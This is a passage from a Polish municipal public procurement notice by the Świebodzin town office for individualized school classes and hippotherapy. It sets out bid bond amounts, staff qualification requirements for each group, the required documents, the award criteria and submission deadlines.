<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Wykonawca zobowiązany jest do wniesienia Wadium w wysokości: 
-Grupa 1- 1500,00 zł (słownie: jeden tysiąc pięćset złotych 00/100),
-Grupa 2- 1200,00 zł (słownie: jeden tysiąc dwieście złotych 00/100),
-Grupa 3- 1000,00 zł (słownie: jeden tysiąc  złotych 00/100),
-Grupa 4- 400 zł (słownie: czterysta złotych 00/100),
Wadium może być wnoszone w jednej lub kilku formach:
-pieniądzu,
-poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
-gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy  z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. z 2007 r. Nr 42, poz. 275). 
2.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Gminy Świebodzin Nr 10 1090 1593 0000 0000 5900 9210. Dokument przelewu należy opisać: 
Wadium- Indywidualizacja - Grupa 1 
Lub
Wadium- Indywidualizacja - Grupa 2 
Lub
Wadium- Indywidualizacja - Grupa 3 
Lub
Wadium- Indywidualizacja - Grupa 4 
Kopię przelewu należy załączyć do oferty.
3. Wadium w:
-poręczeniach lub gwarancjach bankowych,
-gwarancjach ubezpieczeniowych,
-poręczeniach,
należy złożyć w siedzibie Urzędu Miejskiego w Świebodzinie, I piętro - pokój nr 17 - w godzinach pracy Urzędu.  
Kopię dokumentu wadium należy załączyć do oferty.
4.Poręczenia instytucji kredytowych i gwarancje ubezpieczeniowe obejmować winny czas związania Wykonawcy ofertą oraz zawierać informacje dotyczące utraty wadium zgodnie  z art. 46. ust. 4a Ustawy - Prawo zamówień publicznych.
5.Termin wniesienia wadium - do dnia 28.02.2012 r. do godz. 12:00.
6. Zgodnie z art. 24 ust. 2 pkt 2 Wykonawcę, który nie wniósł wadium do dnia 28.02.2012 r. do godz. 12:00 wyklucza się z postępowania.
7.Wadium wnoszone w pieniądzu uznane będzie za wniesione w terminie tylko w przypadku wpłynięcia na konto Zamawiającego przed upływem terminu wyznaczonego na  złożenie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Grupa 1, Grupa 2, Grupa 3, Grupa 4:
Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.
Grupa 5:
Wykonawca musi wykazać spełnianie warunku dysponowania co najmniej :
-1 przeszkolonym koniem do hipoterapii z aktualnymi szczepieniami oraz niezbędnym wyposażeniem do prowadzenia zajęć,
- ujeżdżalnią krytą w odległości do 3km od granic miasta Świebodzin,
- ujeżdżalnię zewnętrzną (padok) do 3km od granic miasta Świebodzin.  
Wykonawca może polegać na  potencjale technicznym innych podmiotów  do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Zamawiający oceni spełnianie warunków udziału w postępowaniu wg kryteriów: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Grupa 1: 
Wykonawca musi wykazać spełnianie warunku dysponowania:
 Zadanie 1 :  co najmniej jedną osobą, która ukończyła:
- studia wyższe magisterskie albo studia wyższe  na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej. 

Zadanie 2: co najmniej jedną osobą, która ukończyła:
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej

Zadanie 3:  co najmniej jedną osobą, która ukończyła: 
 -studia wyższe magisterskie albo studia wyższe  pedagogiczne  oraz studia podyplomowe z zakresu logopedii.  
Posiada minimum 3 letnie doświadczenie w pracy logopedy.

Zadanie 4: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym i posiada uprawnienia do prowadzenia zajęć z terapii pedagogicznej,
 albo
- studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym i ukończone studia podyplomowe z zakresu terapii pedagogicznej. 
Posiada minimum 3 letnie doświadczenie w terapii pedagogicznej.
 
Zadanie 5:  co najmniej jedną osobą, która ukończyła:
-studia wyższe  magisterskie kierunkowe-wychowanie fizyczne z przygotowaniem pedagogicznym oraz kwalifikacje do prowadzenia gimnastyki korekcyjnej,
 albo 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe z zakresu wychowania fizycznego i gimnastyki korekcyjnej.
Posiada minimum 3 letnie doświadczenie w prowadzeniu zajęć gimnastyki korekcyjnej.

Zadanie 6:  co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym i posiada uprawnienia do prowadzenia zajęć z terapii pedagogicznej,
 albo 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym i ukończone studia podyplomowe z zakresu terapii pedagogicznej. 
Posiada minimum 3 letnie doświadczenie w terapii pedagogicznej.

Zadanie 7:   co najmniej jedną osobą, która ukończyła:
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej

Zadanie 8:  co najmniej jedną osobą, która ukończyła:
- studia wyższe magisterskie albo studia wyższe  na kierunku edukacji wczesnoszkolnej (nauczanie początkowe,  kształcenie zintegrowane),
 albo
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej

Zadanie  9:  co najmniej jedną osobą, która ukończyła:
-studia wyższe magisterskie albo studia wyższe  na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane)  oraz  studia podyplomowe z j. niemieckiego,
 albo 
-studia wyższe magisterskie albo studia wyższe kierunkowe- filologia germańska wraz z przygotowaniem pedagogicznym. 
Posiada minimum 3 letnie doświadczenie w nauczaniu języka niemieckiego.

Zadanie 10: co najmniej jedną osobą, która ukończyła:
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej

Zadanie 11: co najmniej jedną osobą, która ukończyła:
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyzsze pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Wykonawca może polegać na  osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Zamawiający oceni spełnianie warunków udziału w postępowaniu wg kryteriów: spełnia - nie spełnia.
Grupa 2: 
Wykonawca musi wykazać spełnianie warunku dysponowania:

Zadanie 1: co najmniej jedną osobą, która ukończyła:
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Zadanie 2:  co najmniej jedną osobą, która ukończyła:
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej

Zadanie 3 : co najmniej jedną osobą, która ukończyła:
 -studia wyższe magisterskie albo studia wyższe pedagogiczne  oraz studia podyplomowe z zakresu logopedii.  
Posiada minimum 3 letnie doświadczenie w pracy logopedy.

Zadanie 4:  co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym i posiada uprawnienia do prowadzenia zajęć z terapii pedagogicznej,
 albo 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym i ukończone studia podyplomowe z zakresu terapii pedagogicznej. 
Posiada minimum 3 letnie doświadczenie w terapii pedagogicznej.

Zadanie 5:  co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie kierunkowe- wychowanie fizyczne z przygotowaniem pedagogicznym oraz kwalifikacje do prowadzenia gimnastyki korekcyjnej ,
albo
- studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe z zakresu wychowania fizycznego i gimnastyki korekcyjnej.
Posiada minimum 3 letnie doświadczenie w prowadzeniu zajęć gimnastyki korekcyjnej.

Zadanie 6: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym i posiada uprawnienia do prowadzenia zajęć z terapii pedagogicznej,
 albo 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym i ukończone studia podyplomowe z zakresu terapii pedagogicznej. 
Posiada minimum 3 letnie doświadczenie w terapii pedagogicznej.

Zadanie 7: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej

Zadanie 8: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe,  kształcenie zintegrowane) oraz  studia podyplomowe z j. angielskiego,
  albo
-studia wyższe magisterskie albo studia wyższe kierunkowe -filologia angielska wraz  z przygotowaniem pedagogicznym .
Posiada minimum 3 letnie doświadczenie w nauczaniu języka angielskiego.
 
Zadanie 9: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe  na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Zadanie 10: co najmniej jedną osobą ,która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Zadanie 11:co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Wykonawca może polegać na  osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Zamawiający oceni spełnianie warunków udziału w postępowaniu wg kryteriów: spełnia - nie spełnia.
Grupa 3: 
Wykonawca musi wykazać spełnianie warunku dysponowania:
Zadanie 1: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Zadanie 2:co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe pedagogiczne  oraz studia podyplomowe z zakresu logopedii.  
Posiada minimum 3 letnie doświadczenie w pracy logopedy.

Zadanie 3: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie  kierunkowe- wychowanie fizyczne z przygotowaniem pedagogicznym oraz kwalifikacje do prowadzenia gimnastyki korekcyjnej,
 albo 
-studia wyższe magisterskie albo studia wyższe z przygotowaniem pedagogicznym oraz studia podyplomowe z zakresu wychowania fizycznego i gimnastyki korekcyjnej.
Posiada minimum 3 letnie doświadczenie w prowadzeniu zajęć gimnastyki korekcyjnej.

Zadanie 4 :co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Zadanie 5 :co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyzsze na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Wykonawca może polegać na  osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Zamawiający oceni spełnianie warunków udziału w postępowaniu wg kryteriów: spełnia - nie spełnia.
Grupa 4: 
Wykonawca musi wykazać spełnianie warunku dysponowania:
Zadanie 1:co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Zadanie 2: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Zadanie 3:co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe pedagogiczne  oraz studia podyplomowe z zakresu logopedii.  
Posiada minimum 3 letnie doświadczenie w pracy logopedy.

Zadanie 4:co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe  na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Zadanie 5: co najmniej jedną osobą, która ukończyła: 
-studia wyższe magisterskie albo studia wyższe na kierunku edukacji wczesnoszkolnej (nauczanie początkowe albo  kształcenie zintegrowane),
 albo 
-studia wyższe magisterskie albo studia wyższe pedagogiczne oraz studia podyplomowe z zakresu nauczania wczesnoszkolnego i przedszkolnego.
Posiada minimum 3 letnie doświadczenie w pracy pedagogicznej.

Wykonawca może polegać na  osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Zamawiający oceni spełnianie warunków udziału w postępowaniu wg kryteriów: spełnia - nie spełnia.
Uwaga: 
Osoby prowadzące zajęcia w Grupie 1, Grupie 2, Grupie 3, Grupie 4 powinny posiadać kwalifikacje do prowadzenia zajęć dydaktycznych w szkołach podstawowych zgodnie z rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. Nr 50, poz. 400).

Grupa 5: 
Wykonawca musi wykazać spełnianie warunku dysponowania:
Zadanie 1:co najmniej jedną osobą, która ukończyła: 
-kursy i szkolenia uprawniające do prowadzenia zajęć hipoterapii.
Posiada minimum  2 lata doświadczenia w prowadzeniu zajęć terapeutycznych w zakresie hipoterapii z dziećmi niepełnosprawnymi.  

Wykonawca może polegać na  osobach zdolnych do wykonania zamówienia niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Zamawiający oceni spełnianie warunków udziału w postępowaniu wg kryteriów: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu z art. 22 ust. 1 ustawy Prawo zamówień publicznych .
2.Pisemne zobowiązanie podmiotów, o których mowa w Rozdziale X ust. 2 SIWZ, o ile wykonawca polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych.
3.Wykonawca zobowiązany jest złozyć oświadczenie, że  wykona zamówienie siłami własnymi lub określi część zamówienia, której wykonanie powierzy podwykonawcom 
4. Formularz ofertowy na Grupę/Grupy z załącznikami.
5. Pelnomocnictwo w formie oryginalu lub kopii poświadczonej notarialnie (jeżeli dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy wraz z określeniem warunków takich zmian zawarta jest we wzorze umowy stanowiącej załącznik Nr 12-1 (Grupa 1), . załącznik nr 12-2 (Grupa 2),załącznik nr 12-3 (Grupa 3),załącznik nr 12-4 (Grupa 4),załącznik nr 12-5 (Grupa 5) do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.swiebodzin.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świebodzinie ul. Rynkowa 2, 66-200 Świebodzin , pok. nr 17. Cena SIWZ -30 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2012 godzina 12:00, miejsce: Urząd Miejski w Świebodzinie ul. Rynkowa 2, 66-200 Świebodzin , pok. nr 22.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamówienie współfinansowane z Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, poddziałanie 9.1.2. -Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych
2. Rozliczenie między Zamawiającym a Wykonawcą będzie się odbywało w walucie polskiej..</p>
